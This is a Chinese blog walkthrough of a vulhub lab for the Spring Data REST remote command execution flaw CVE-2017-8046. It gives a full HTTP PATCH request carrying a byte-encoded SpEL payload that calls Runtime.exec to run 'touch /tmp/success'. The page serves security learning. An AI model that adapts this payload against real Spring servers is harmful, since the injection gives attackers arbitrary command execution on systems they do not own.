当前位置: 首页 > article >正文

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046) 靶场攻略

article 2025/1/12 18:53:45

靶场环境

vulhub/spring/CVE-2017-8046

漏洞复现

1. 访问 http://47.113.231.0:8080/customers/1

2.抓取数据包,使⽤PATCH请求来修改

PATCH /customers/1 HTTP/1.1
Host: 47.113.231.0:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 200

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11
5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

3.进⼊docker容器内查看是否执⾏命令


http://www.kler.cn/a/317516.html

相关文章:

  • 完美解决VMware 17.0 Pro安装ubuntu、Deepin等虚拟机后卡顿、卡死问题
  • MySQL数据导出导入
  • FreeROTS学习 内存管理
  • 【钉钉在线笔试题】字符串表达式的加减法
  • Git:Cherry-Pick 的使用场景及使用流程
  • Ubuntu 20.04安装gcc
  • phpword读取word docx文档文本及图片转html格式
  • ElasticSearch分页查询性能及封装实现
  • 为什么推荐使用英文版LabVIEW
  • linux-网络管理-网络配置
  • 直播美颜工具的开发详解:基于视频美颜SDK的解决方案
  • java项目之基于springboot的医院资源管理系统源码
  • 【Linux 从基础到进阶】 Xen 虚拟化技术应用
  • 【实践功能7】前端实现截屏
  • Leetcode算法基础篇-递归算法
  • Spring事务类型及传播行为实战指南
  • JEDEC DDR4 SRAM standard
  • go 读取excel数据存储到mysql
  • 案例研究丨国控星鲨利用DataEase释放数据潜能,重塑业务视野
  • 从底层原理上解释 ClickHouse 的索引
  • leetcode 205.同构字符串
  • 如何快速上手一个Github的开源项目
  • C++ 9.24
  • 如何使用ssm实现疫苗预约系统+vue
  • 使用synchronized锁住字符串
  • Shire 智能体市场:IDE 一键安装多智能体,协同打造集体智慧 Copilot